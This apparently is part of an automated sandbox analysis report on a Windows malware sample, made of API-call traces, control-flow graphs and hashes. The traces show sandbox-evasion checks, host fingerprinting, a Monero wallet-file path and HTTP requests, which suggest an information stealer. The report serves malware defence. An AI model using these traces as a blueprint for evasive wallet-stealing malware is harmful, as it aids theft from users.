                                • Part of subcall function 00FCA820: lstrlen.KERNEL32(00FB4F05,?,?,00FB4F05,00FD0DDE), ref: 00FCA82B
                                • Part of subcall function 00FCA820: lstrcpy.KERNEL32(00FD0DDE,00000000), ref: 00FCA885
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5857
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FC51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5228
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5318
                                • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC532F
                                • Part of subcall function 00FC52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00FC5364
                                • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC5383
                                • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00FC5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 87c8293d430d93d12cda99f0dcf9cd6edf976be8d4e4790d9a45ef6d2894e754
                              • Instruction ID: 784de1447d2df7fed72fe1cd410ff1acad1d06a224a891ccbd3827cf0b66bc58
                              • Opcode Fuzzy Hash: 87c8293d430d93d12cda99f0dcf9cd6edf976be8d4e4790d9a45ef6d2894e754
                              • Instruction Fuzzy Hash: 1AE13E729101099BCB18FBA0EE57FED7338AF54704F44812CA416571D5EF38BA49EBA2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 fc17a0-fc17cd call fcaad0 StrCmpCA 1304 fc17cf-fc17d1 ExitProcess 1301->1304 1305 fc17d7-fc17f1 call fcaad0 1301->1305 1309 fc17f4-fc17f8 1305->1309 1310 fc17fe-fc1811 1309->1310 1311 fc19c2-fc19cd call fca800 1309->1311 1313 fc199e-fc19bd 1310->1313 1314 fc1817-fc181a 1310->1314 1313->1309 1316 fc185d-fc186e StrCmpCA 1314->1316 1317 fc187f-fc1890 StrCmpCA 1314->1317 1318 fc1835-fc1844 call fca820 1314->1318 1319 fc1970-fc1981 StrCmpCA 1314->1319 1320 fc18f1-fc1902 StrCmpCA 1314->1320 1321 fc1951-fc1962 StrCmpCA 1314->1321 1322 fc1932-fc1943 StrCmpCA 1314->1322 1323 fc1913-fc1924 StrCmpCA 1314->1323 1324 fc18ad-fc18be StrCmpCA 1314->1324 1325 fc18cf-fc18e0 StrCmpCA 1314->1325 1326 fc198f-fc1999 call fca820 1314->1326 1327 fc1849-fc1858 call fca820 1314->1327 1328 fc1821-fc1830 call fca820 1314->1328 1350 fc187a 1316->1350 1351 fc1870-fc1873 1316->1351 1329 fc189e-fc18a1 1317->1329 1330 fc1892-fc189c 1317->1330 1318->1313 1344 fc198d 1319->1344 1345 fc1983-fc1986 1319->1345 1335 fc190e 1320->1335 1336 fc1904-fc1907 1320->1336 1341 fc196e 1321->1341 1342 fc1964-fc1967 1321->1342 1339 fc194f 1322->1339 1340 fc1945-fc1948 1322->1340 1337 fc1926-fc1929 1323->1337 1338 fc1930 1323->1338 1331 fc18ca 1324->1331 1332 fc18c0-fc18c3 1324->1332 1333 fc18ec 1325->1333 1334 fc18e2-fc18e5 1325->1334 1326->1313 1327->1313 1328->1313 1352 fc18a8 1329->1352 1330->1352 1331->1313 1332->1331 1333->1313 1334->1333 1335->1313 1336->1335 1337->1338 1338->1313 1339->1313 1340->1339 1341->1313 1342->1341 1344->1313 1345->1344 1350->1313 1351->1350 1352->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00FC17C5
                              • ExitProcess.KERNEL32 ref: 00FC17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 4d68e126b3968c62881f117012788353137af240c60f58ae72ac43dc948f150a
                              • Instruction ID: a914c61b47a7eea8cf66859bfa4ed164794a9dfe374a36fba5e59df3ae990513
                              • Opcode Fuzzy Hash: 4d68e126b3968c62881f117012788353137af240c60f58ae72ac43dc948f150a
                              • Instruction Fuzzy Hash: 6B519DB5A0420AEBCB04DFA0DA56FBE37B6BF44704F10405DE41AA7341DB74E961EB62

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 fc7500-fc754a GetWindowsDirectoryA 1357 fc754c 1356->1357 1358 fc7553-fc75c7 GetVolumeInformationA call fc8d00 * 3 1356->1358 1357->1358 1365 fc75d8-fc75df 1358->1365 1366 fc75fc-fc7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 fc75e1-fc75fa call fc8d00 1365->1367 1368 fc7628-fc7658 wsprintfA call fca740 1366->1368 1369 fc7619-fc7626 call fca740 1366->1369 1367->1365 1377 fc767e-fc768e 1368->1377 1369->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FC7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FC757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC760A
                              • wsprintfA.USER32 ref: 00FC7640
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 186c4fd966f13d28e794d9c394a3db1100a680088ad5755af89cba24358b1045
                              • Instruction ID: 2712be0a69d85e1007cea3d592c4c9894c0f4f8c950142022b12f07c1e62627c
                              • Opcode Fuzzy Hash: 186c4fd966f13d28e794d9c394a3db1100a680088ad5755af89cba24358b1045
                              • Instruction Fuzzy Hash: 4A418FB1D04349ABDB10DB94DD46FEEBBB8AF48714F10019CF50967280DB78AA84DFA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DDDBB0), ref: 00FC98A1
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DDDBE0), ref: 00FC98BA
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DDDAA8), ref: 00FC98D2
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8C40), ref: 00FC98EA
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8CD0), ref: 00FC9903
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE9168), ref: 00FC991B
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DD5FF0), ref: 00FC9933
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DD5FB0), ref: 00FC994C
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8CA0), ref: 00FC9964
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8D48), ref: 00FC997C
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8BC8), ref: 00FC9995
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8C10), ref: 00FC99AD
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DD6130), ref: 00FC99C5
                                • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(77190000,00DE8BE0), ref: 00FC99DE
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FB11D0: ExitProcess.KERNEL32 ref: 00FB1211
                                • Part of subcall function 00FB1160: GetSystemInfo.KERNEL32(?), ref: 00FB116A
                                • Part of subcall function 00FB1160: ExitProcess.KERNEL32 ref: 00FB117E
                                • Part of subcall function 00FB1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB112B
                                • Part of subcall function 00FB1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB1132
                                • Part of subcall function 00FB1110: ExitProcess.KERNEL32 ref: 00FB1143
                                • Part of subcall function 00FB1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FB123E
                                • Part of subcall function 00FB1220: __aulldiv.LIBCMT ref: 00FB1258
                                • Part of subcall function 00FB1220: __aulldiv.LIBCMT ref: 00FB1266
                                • Part of subcall function 00FB1220: ExitProcess.KERNEL32 ref: 00FB1294
                                • Part of subcall function 00FC6770: GetUserDefaultLangID.KERNEL32 ref: 00FC6774
                                • Part of subcall function 00FB1190: ExitProcess.KERNEL32 ref: 00FB11C6
                                • Part of subcall function 00FC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                                • Part of subcall function 00FC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                                • Part of subcall function 00FC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                                • Part of subcall function 00FC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                                • Part of subcall function 00FC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                                • Part of subcall function 00FC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DE90A8,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00FC6AF9
                              • Sleep.KERNEL32(00001770), ref: 00FC6B04
                              • CloseHandle.KERNEL32(?,00000000,?,00DE90A8,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6B1A
                              • ExitProcess.KERNEL32 ref: 00FC6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 8f4e06549d4691621c896dfa246ecd627770b39dedce45e44480e27fc5f12819
                              • Instruction ID: b35c8548161423df7e642f36d339c121d77aba8d82cd1ddf829594c1ae7bec43
                              • Opcode Fuzzy Hash: 8f4e06549d4691621c896dfa246ecd627770b39dedce45e44480e27fc5f12819
                              • Instruction Fuzzy Hash: 53310B7190420EAADB18F7A0ED57FEE7778AF44304F50452CF212A21C1DF786945EBA6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 fb1220-fb1247 call fc89b0 GlobalMemoryStatusEx 1439 fb1249-fb1271 call fcda00 * 2 1436->1439 1440 fb1273-fb127a 1436->1440 1442 fb1281-fb1285 1439->1442 1440->1442 1444 fb129a-fb129d 1442->1444 1445 fb1287 1442->1445 1447 fb1289-fb1290 1445->1447 1448 fb1292-fb1294 ExitProcess 1445->1448 1447->1444 1447->1448
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FB123E
                              • __aulldiv.LIBCMT ref: 00FB1258
                              • __aulldiv.LIBCMT ref: 00FB1266
                              • ExitProcess.KERNEL32 ref: 00FB1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 3e253fbad67b38f9cdcf73424743f2889f635da81a3b6474b01da4633d313ec3
                              • Instruction ID: 2e3791b1631e9d52ccfa9ff31ae6c7bd0cb1f0acc773e526b095fd47577329d9
                              • Opcode Fuzzy Hash: 3e253fbad67b38f9cdcf73424743f2889f635da81a3b6474b01da4633d313ec3
                              • Instruction Fuzzy Hash: 74014BB0D40308AAEB10DBE1DC4ABAEBB78BF04701F608068E605B6280D67866459B99

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 fc6af3 1451 fc6b0a 1450->1451 1453 fc6b0c-fc6b22 call fc6920 call fc5b10 CloseHandle ExitProcess 1451->1453 1454 fc6aba-fc6ad7 call fcaad0 OpenEventA 1451->1454 1459 fc6ad9-fc6af1 call fcaad0 CreateEventA 1454->1459 1460 fc6af5-fc6b04 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DE90A8,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00FC6AF9
                              • Sleep.KERNEL32(00001770), ref: 00FC6B04
                              • CloseHandle.KERNEL32(?,00000000,?,00DE90A8,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6B1A
                              • ExitProcess.KERNEL32 ref: 00FC6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: e325c05725a5fd67ae57e791491075f8be4802e217d0ce9ae5e132d42ff001dd
                              • Instruction ID: f2b777320bddb0558cbf8d1f16d76a1efc2a2a4c35397fabce51c643f401d920
                              • Opcode Fuzzy Hash: e325c05725a5fd67ae57e791491075f8be4802e217d0ce9ae5e132d42ff001dd
                              • Instruction Fuzzy Hash: BDF0307094420BAAE714ABA0AE07F7D7B74EF44705F10452CB527E2181DBB86981F755

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: e416036c6507d5a5469ff35e40361f83c54e8eee31d643c93c755b69b9086fc4
                              • Instruction ID: 32651583962b4a2034a39dbd0a033f57a97f879635b1e99ee609d3cdf2534bac
                              • Opcode Fuzzy Hash: e416036c6507d5a5469ff35e40361f83c54e8eee31d643c93c755b69b9086fc4
                              • Instruction Fuzzy Hash: 27212FB1D00209ABDF14EFA5ED4ABDD7B74FB44310F108629E525A72C0DB746609DB91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB6280: InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                                • Part of subcall function 00FB6280: StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB6303
                                • Part of subcall function 00FB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                                • Part of subcall function 00FB6280: HttpOpenRequestA.WININET(00000000,GET,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB6385
                                • Part of subcall function 00FB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                                • Part of subcall function 00FB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
